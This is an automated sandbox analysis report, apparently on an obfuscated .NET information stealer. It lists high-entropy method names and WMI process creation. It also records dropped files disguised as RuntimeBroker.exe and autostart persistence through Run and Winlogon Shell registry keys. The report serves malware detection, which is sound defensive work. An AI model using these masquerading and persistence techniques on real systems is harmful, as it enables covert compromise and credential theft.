Source: ogVinh0jhq.exe, EwJ4ePQKphvGEC2GHdT.cs	High entropy of concatenated method names: 'klfFbTQpdy', 'BjeFrqWFYi', 'LDLPUEFvFXjRVd3sVcw', 'H5BlHqFjaM6N7BAF6l0', 'JiiYb9FF0WPK2q4UGQS', 'z37f1ZFSBmHg85OWP4A', 'IZg95UFUcaNbXaD39Bp', 'T36lOmF8J2UJN3xh0i1', 'OYaV8fFCZS6n1aSHdki', 'lIp6D7FHFY9rkdu7Akn'
Source: ogVinh0jhq.exe, foBKrucDghpWn1qMsl6.cs	High entropy of concatenated method names: 'qNOnGmuXZf', 'PrjnqJ9kF2', 'voQno0MZq0', 'g57qeAXh3EFmHEs7sH8', 'NaLYYwXMx4cocW7BfEN', 'BH6sm4XuPTUyVpwr233', 'yZNtdqXfSk7eIL97OV8', 'Mq7nsRV1jY', 'AAlnWlDnPu', 'AeHn9lD2hh'
Source: ogVinh0jhq.exe, ELF9l8capltpnwrt5Vt.cs	High entropy of concatenated method names: '_269', '_5E7', 'VDGw1WEgWB', 'Mz8', 'PCswPp8qp9', 'SMbOTqETTCrYylrISJ4', 'YtLEyQEaZcEW8yRvMeA', 'HimrXDExPc7WbX9NXtb', 'TFcHemE3DV1BWMAv0Wh', 'oy6C3mEgyRuMIBovlDP'
Source: ogVinh0jhq.exe, ECpBQdQ2puoAFPASyKF.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'B9xAF8sdfMUnrv3VZVn', 'a5CBqfs5CLHGMvgnISd', 'y9WFwfsWEcjKdnsGNnp', 't8bts8soG9QxOpPUDGM', 'EI5h98sK5xyMhJugr21', 'Igfdiws74JEOJgYXjvN'
Source: ogVinh0jhq.exe, o7RV1j0oYJAllDnPuwe.cs	High entropy of concatenated method names: 'HFZ20efDrf', 'svD2yaj8CQ', 'wAA2sdj0pe', 'YmRZ0F0GUt1AOydty4x', 'iI6llY06SDBgCR8ZPjL', 'WpDIqV0C8JZkCEidkCq', 'gHekEm0He84s4gLkuGs', 'UrtMLG0mdvqLisJl7ps', 'MRbNT70YFIJC2bQSdn5', 'wwTDLU0pUr6yAlJbjfi'
Source: ogVinh0jhq.exe, vqpwvKuP2sH5BAukyy.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'knKS5oQxTEMphMht9wB', 'kk8bZlQ3xOcaWaPBL7w', 'ttNSsxQgYDN2eRSGc3a', 'i3iQp1QcvNUnpjD5YVf', 'smj5cSQDEPnF3uUUZHC', 'KpTB5fQlyd4VeyvQLGX'
Source: ogVinh0jhq.exe, f9gHHM0yLVptsSVe5Aq.cs	High entropy of concatenated method names: 'vH2roW7alK', 'tOwkIVbmL24dbTSh6D8', 'a3MyUCbYjSApT7nch8n', 'm3bTV4bGZb9xLkiHtPR', 'SIZ3Ycb6rGpn5BFxbrU', 'NeEv62ISJB', 'Sj4vmDn1tA', 'jTkvMDHddF', 'TC7vNQwESi', 'VBqvBVHG6M'
Source: ogVinh0jhq.exe, RbL9RwQy9wo4jibIN2K.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'tCWHlCnJIa5Y9dy5BY7', 'nFdaB1n9J2hQi5fqyTE', 'M8eTy9nP8SU5MKSUDOA', 'i7kUYWnO8ZUe2D29hMO', 'FLV03MnqoqdVvq9tSmR', 'jo2KLOnTffWay5BwXP1'
Source: ogVinh0jhq.exe, SET0UAQqZkNKtQ5PjTb.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'adrbVXsajMwYXWOFmoY', 'z2o222sxRi1FWZB5PNR', 'XCYSOLs3Qsm43L5BIyV', 'ekQgMCsg666OoUfExZJ', 'OZxVICsc5UX5eV9qX2V', 'pVTW62sDxfNm7rvTVjB'
Source: ogVinh0jhq.exe, HBRIyW0nWZOL16IrZmJ.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: ogVinh0jhq.exe, ImNl0pcqgwmU50VN4gO.cs	High entropy of concatenated method names: 'zBa9PyeijA', 'R4y9YeDUX4', 'gE29OLXRk4', 'qejRv7kJjIj7nMnva9M', 'FvjnELk9hBE5ESEkktB', 'gEHUWwkPY7BmOi0Z00D', 'atcyb3kOAnV7jUXnpGg', 'OlP9uekqBnSUKLliX23', 'AACTbMkT4GmqL9ddUOZ', 'hwjDwWka8771V1r3Rlq'
Source: ogVinh0jhq.exe, QGgIE3QclY72Bb6EZE9.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'VNt3r1noNaHJuWdytLs', 'X52OUbnKH0IJLsMI9Ej', 'a2siWtn7tEn5C37xYHU', 'KF70A4nwFjnPMBp7LcK', 'XMs4yonZqu0QpQAwHOg', 'tH7sjxnLQHAwIA0GBn0'
Source: ogVinh0jhq.exe, gQsuSJswVvPfCLaIoJT.cs	High entropy of concatenated method names: 'rOSInFTwKg', 'rxcIvqKXwT', 'vwrIb86iL9', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'PsGIrp66Fu'
Source: ogVinh0jhq.exe, yOsVcTsCd3RjBSdYqLm.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: ogVinh0jhq.exe, Wf7nrns7iFwthyk3fO6.cs	High entropy of concatenated method names: 'JSHXxHN3Fx', 'BwbXjqlDbg', 'rJEX7GD8qf', 'jhwXl3Qim2', 'SQ3Xk0fUC7', 'WL5rgGtc9QTpqkCLelg', 'N1xfy3tDxga54fKbjq3', 'YrYIfCtlu6hvh8Cnsx4', 'bmFxiltz6BtwllCmbGi', 'lR2XCrMr9JJsKMoRY7i'
Source: ogVinh0jhq.exe, yVwWyeXvxxYuCUWgWH.cs	High entropy of concatenated method names: 'LONBmSFFX', 'xvN1cC10b', 'yxOLXsf9u', 'NYrqbiyRvcvOyKOg1D2', 'wjkMtryN0ytqNAIipxb', 'SGFBWJyB7a7Hm4RwHuN', 'NiOi0jyiaGJxSNro35M', 'yAWsfyytaRQO7q5Gk6A', 'fv0P0lyM6Y7FjwovL0q', 'rm9Ml9yu1dFj6MEgoDy'
Source: ogVinh0jhq.exe, fuRQ37czoVh3wnipeJi.cs	High entropy of concatenated method names: 'A1JvJ9TZxK', 'IPUvwl713t', 'qAwvdB08iy', 'OBIKNRAMfPEILJgHs1T', 'a8n3FrAu2jxZisKX55h', 'bsLdQIAiX2bsgYclYgB', 'nZ4YyEAt96LEMR890M3', 'farUsjAheb7fTCYcXkS', 'UnN6trAfUlYg2oAcnwe', 'g3dlqdAJwfKpAAbVMRX'
Source: ogVinh0jhq.exe, DUUiuXcORpS8S3yF1WH.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'DTxvbMFUjf', 'wD1w8sVpdn', 'GbBvrmGx4V', 'FUWwBj6XBE', 'WMiSaHERCJ4QaZ8Q1uF', 'kTpoYeEiZmh7ODDSyC3', 'RYT4cAEN2scdVUysdJm'
Source: ogVinh0jhq.exe, uMen7d0ilaVWThJDUwu.cs	High entropy of concatenated method names: 'SvWGCZeHOP', 'J5fGIvVbIG', 'lJbGpeX1v1', 'JlVGebIh0S', 'jniGGVOw5V', 'oTxGqCkme5', 'wvqGo3psAT', 'D5LGHqVqEe', 'NbvGZaiOOh', 'Tm1GDk2Mub'
Source: ogVinh0jhq.exe, u2yGcdQDoY2HMBqJ4J1.cs	High entropy of concatenated method names: 'NMjQdf78rf', 'g0SFAq160rZGL7Tt0dS', 'ySj14u1mclkAgVhNqu9', 'SiDpgM1HPnTEF9Z6YUV', 'v81JSM1Gi4R2B7xJNKQ', 'AuVRt01Y0acN7L9V8sV', 'fpRRAd1pxrA5cWkKTeT', 'JQRiCv1kgFt0vmUNfJn', 'lnjemy1XkuNNVMMOI2V', 'f28'
Source: ogVinh0jhq.exe, O0stb4QifYbWVykRQFo.cs	High entropy of concatenated method names: 'YEEFDYJ3Jn', 'dVvpSBvnQVgI8nh5pUT', 'jTGgNovsKtYjVYf3yoi', 'H8ujedvV0phe8GElFcm', 'GmmRLcvQMhpGkva4mog', 'ckUC1ev1H0vjDiuRExV', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: ogVinh0jhq.exe, DMeWGxc8hcs5m8ZXnpa.cs	High entropy of concatenated method names: '_5u9', 't68wbaqRy3', 'O4ovV5P59A', 'xofwAoJs1n', 'U02bTF4cgrtMKc4TRO8', 'kh9AwH4DoHtXYHaCaJy', 'qApZV44l2BDtKBeO6gI', 'hqReDE4325CrMxrGfU0', 'gEuvb24gymEdSLLxGLb', 'xa1T5b4z5oJUu1LGvux'
Source: ogVinh0jhq.exe, P9G9Nuc7F3uEbhPqBIq.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'iTiCOc4UsSwkh4XEaE8', 'q5S6hS48qgXhcoMAuTY', 'sSjwQg4CL7X1ZEIhZnR', 'xV3byx4HDvN9WxE7All'
Source: ogVinh0jhq.exe, iSMcK0O8HARc1nsr8N.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'iIPOvBQCXvDtpVEbfWf', 'a5yNHoQHeEPFpFqOAuv', 'OSeLhnQGQheSIfO0ruE', 'jNF9m2Q60qN0XAhKU94', 'R8LVYKQm3j7S6GPKeHc', 'SDaUpTQYpAQ4WlYII7U'
Source: ogVinh0jhq.exe, ACdmVJzFbNMvomhJ28.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'kCLW2YnIjHKg2N3evrN', 'WavgDFnVNrCClM2Y59G', 's7OWo8nQpKxTyECgEEw', 'NrVcidnnVURgaQYyM3U', 'r7a80Nns9GPYrP5Kd4p', 's5ppqpn1NsFTxEkoIMr'
Source: ogVinh0jhq.exe, MyglWQQnCTuDFHX2rOr.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'otqlIDssfDomyvUnBkN', 'DNnC2cs1JQvvnqj9KHr', 't4GGaAs2DIG5ypxHJrW', 'WI3DEmsjBQt6qICMM6D', 'x6vt52sFvChsaAahqBQ', 'G8nSYjsvWAqdOPlSv7V'
Source: ogVinh0jhq.exe, lVjSyqyh4MciiZr9MUQ.cs	High entropy of concatenated method names: 'cUxCJWut43', 'wsYCw0xfyG', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'vDTCdwq0SP', '_5f9', 'A6Y'
Source: ogVinh0jhq.exe, sfLnQDFFIRP2ybT6G7L.cs	High entropy of concatenated method names: 'REPFtnvUJa', 'S87FP2yGcd', 'pY2FYHMBqJ', 'IJ1FOgC0Fv', 'sYRFRqbRS5', 'EDnFa0ypCV', 'lV084pS6m54FZtfZGFf', 'GZmdHfSm6bgfsoKpHvO', 'zKI9yESHUoXf3mLfu7B', 'ABDyvKSGv0FM8P3QJUg'
Source: ogVinh0jhq.exe, QCsEfVQPicMHmD3NQou.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'zuLWkiFkOHiQc3JfhAn', 'Tc245tFXRUH9w9iE96a', 'GBOE14F44bguDSe70ek', 'MnuWqhFESd7MeLOubha', 'W2DW7NFAqHUP4A8Fh59', 'Che3ljFbW0jk5mBOU7a'
Source: ogVinh0jhq.exe, XxtgiX028UW1bH3VyDc.cs	High entropy of concatenated method names: 'ldRr15pIQ0', 'ajjrLwPcT5', 'L2Vr4jSyq4', 'EcirfiZr9M', 'KQSrUBAMEF', 'oVwVj3bl2pqHKnOouMB', 'w4aNyLbzkgd8apP0nJ5', 'WlPGIibcekqxj4taBIk', 'b9QEpNbD7Ux4EAB83NO', 'OpY3LR0rD2aafwYcfaN'
Source: ogVinh0jhq.exe, lwAYSlsL9G64DLHybOR.cs	High entropy of concatenated method names: 'UR5w4tPE6c', 'DHgGCmhoqfZwJKFs1yD', 'bJ3RU6hKLhiijbP6Gca', 'DqugEdh5WkDk4G07FOT', 'R53X8MhWnrqYMc9UcFN', '_1fi', 'AwWJO2OUqG', '_676', 'IG9', 'mdP'
Source: ogVinh0jhq.exe, jNHKWkFxlbVXeWoCKoh.cs	High entropy of concatenated method names: 'rdH0pyBf8M', 'c7x0eDgCyZ', 'VA5bTPCAiHVvefEF2pt', 'NthhvWCbR0R2ajtcFoa', 'wuCj9OC4NcB0g5xJ7wn', 'MpLYXPCEtX5Loid39KS', 'LfqlNDC0VqjPwvuKTCg', 'RBNhODCdgtZCFY9Z2O3', 'QWwQs8C5Y2dLGfUKsQf', 'rXhnF9CWFGDpMRZw1fj'
Source: ogVinh0jhq.exe, lLXRk40bPgcLQIiyVw3.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: ogVinh0jhq.exe, tRUTX2WbfAmTjmfWIyp.cs	High entropy of concatenated method names: 'Iku2oXJJIcG0u', 'ugrulXJCsrEI5VKoXSj', 'xsmxAfJHJXnyltu90Qf', 'tsUWiOJG5Zg62nHcMu2', 'mPwveHJ6OYUOhlvHVaP', 'p9CGLFJmi0HpKBYeA8J', 'U3oDJYJUGpOqYx7aylU', 'XuW0jyJ80PoU1Y4LygO', 'Fbs7uRJYinXaXmH8K5Y', 'zDOhpdJp6Ubyu1NsKdI'
Source: ogVinh0jhq.exe, DTm4ju0avyKoJeHUyMo.cs	High entropy of concatenated method names: 'akKeux39B5', 'pcIeBTTiWB', 'tOle1XkKqD', 'jJfeLuTqXc', 'Vdce4w36rH', 'm3gefICwN1', 'y2GeUySbDe', 'iQUe3ZFS0F', 'xyee5PenLh', 'DXeeTFP9fP'
Source: ogVinh0jhq.exe, YhDHdWFoSkUs56XGNqQ.cs	High entropy of concatenated method names: 'Ib4cuH6xjI', 'wS1chWSo20', 'TqaM418YB1eT0cuQJsN', 'i13s2h8p7jWYWZrpTcb', 'nf6brU8koYogK7aOwnv', 'rNA5MZ8XiE5GlfgjPxB', 'lp5FbU84KCfMrI3E6e9', 'xM4SZe8EGjc76qG8By2', 'aPcfvI8AcOyFSSXrEHL', 'kjFmwR8bHJe2X4AG9SG'
Source: ogVinh0jhq.exe, zGowGoyI7US2Psxy6MW.cs	High entropy of concatenated method names: 'AlJgf5scfr', 'zpRgU4LquN', 'zOvg3N9dYY', 'we1g58ZdTp', 'd2qgTu4s9w', 'tTGjMWB59T39XEpxIZZ', 'X4NWfAB0wWgKCtLk4lP', 'N3ovsbBdg8nuLDDpnyf', 'bps6i3BWAwhfOyv101V', 'qsrkriBoaHjHShEw2qk'
Source: ogVinh0jhq.exe, t3jUMSQbRrb2NBS2HPr.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'L9JhewsYyCVYR7juw9m', 'kV2acSspra9w2L391oy', 'igheCSskQodfLag7UBt', 'kYLpGSsXMQKBrfvvBau', 'O5UopQs4UXIjOUDwT8T', 'bJAjdksElOeskaYpnBw'
Source: ogVinh0jhq.exe, daM39iyRoWjxRJgxECA.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: ogVinh0jhq.exe, KhrAUC0gEmkUhZwA17u.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'FaUpVMYdBs', '_3il', 'c8kpQTWZRU', 'QXBpFYH8B1', '_78N', 'z3K'
Source: ogVinh0jhq.exe, AIgg9UsIH41FlCJGewQ.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: ogVinh0jhq.exe, SqOAyfmduj3Pd5apOH.cs	High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'OB0Ux6Dmq', 'UKDPJleYBTeyH9iOZCL', 'UfA9IeepKyfjmhDtNcx', 'HA3xI7ekyRvnCPaFjpG', 'l90ZWXeXt9b6na5UitK', 's257Hge4wLxKeVg7lJw'
Source: ogVinh0jhq.exe, A3JnM1QWX5einQ9weWq.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'r107Lgn3agLuh8OfhNM', 'dkqTF1ngEGiXbApW2cv', 'LcEmDbncSmOnrojwCcN', 'lPHOLHnDWE6D9UWsraT', 'VPSuiFnlx8QWm9GbuL7', 'ECapCAnzgxniD92HEDw'
Source: ogVinh0jhq.exe, eBf8MFFV7xDgCyZiqxh.cs	High entropy of concatenated method names: 'd3AFC50avB', 'wQSFX8LZJB', 't3jFIUMSRr', 'qf37igvwLEupy4xMdLv', 'aunDhLvZuw7tWKUMBGP', 'i2nSvivLiVdO27RYwHu', 'KxNuI5vNpgy9HTolbun', 'hJIgqVvBx5ocgEOPPHt', 'Ep0hkSvR3cF6xM2QC08', 'xLZPjivKFZiwvasxRsD'
Source: ogVinh0jhq.exe, mWNP6f16hFgsxSQwIW.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'fs5DA6eDKNAeBsSIPGS', 'wG96gWelTXIVuaNUhA3', 'gglOL8ezH2gagMX76cn', 'vP2Ti2IrpYgbOL22St3', 'f8UHEQIyyeqsh0KjB3w', 'JmwgixIeCYpr3B5BmpM'
Source: ogVinh0jhq.exe, CE71vNc0L1Kdc4hGvSd.cs	High entropy of concatenated method names: 'nilW5bG4CP', 'SaCWTS5vTq', 'HCwW8CNbvO', 'BR6WS06WqB', 'ycLWKYmlfd', 'eFrWtWtyoQ', 'b1EKbBYWTuxPwTH6B9F', 'S2BLndYdFRj5hNno7Fd', 'hy8OwxY5dwD8KKBFUEL', 'OVtG6lYo9dvjixgS3YB'
Source: 0.2.ogVinh0jhq.exe.2460000.6.raw.unpack, Mmg2erpeoRL8PYpdPluginrTCwTeUDIGqIR9zJ.cs	High entropy of concatenated method names: '_0001', '_0001', 'ylv8ulDJ1YPOdnLMmg2erpeoRL8PYpdPluginrTCwTeUDIGqIR9zJOnAPIDelegatesCreate_cko9xyV8PXPJCvyu', 'ntL1zO7Fi3R8uPjeD4Of0mKk6517Tkq3FZiMmg2erpeoRL8PYpdPluginrTCwTeUDIGqIR9zJOnInit', 'Ao8n3qKPRohb7hy8xcB458YKdmAxMgztDJq_OnLoad', 'NNcUlZ4XfnRyr8VPN7Wv6cyvod6jjWmR5vUMmg2erpeoRL8PYpdPluginrTCwTeUDIGqIR9zJOnStealerMmg2erpeoRL8PYpdPluginrTCwTeUDIGqIR9zJ', '_0001', 'wS7znTxTv2UDJfua5qFwTDhvjNSfQoPPRr2_OnStealerWorkResultMmg2erpeoRL8PYpdPluginrTCwTeUDIGqIR9zJ', '_0001', '_0002'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe			Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker			Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ITlIQtTGhEyfMRHaLp

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ITlIQtTGhEyfMRHaLp
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ITlIQtTGhEyfMRHaLp
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ITlIQtTGhEyfMRHaLp
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ITlIQtTGhEyfMRHaLp

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
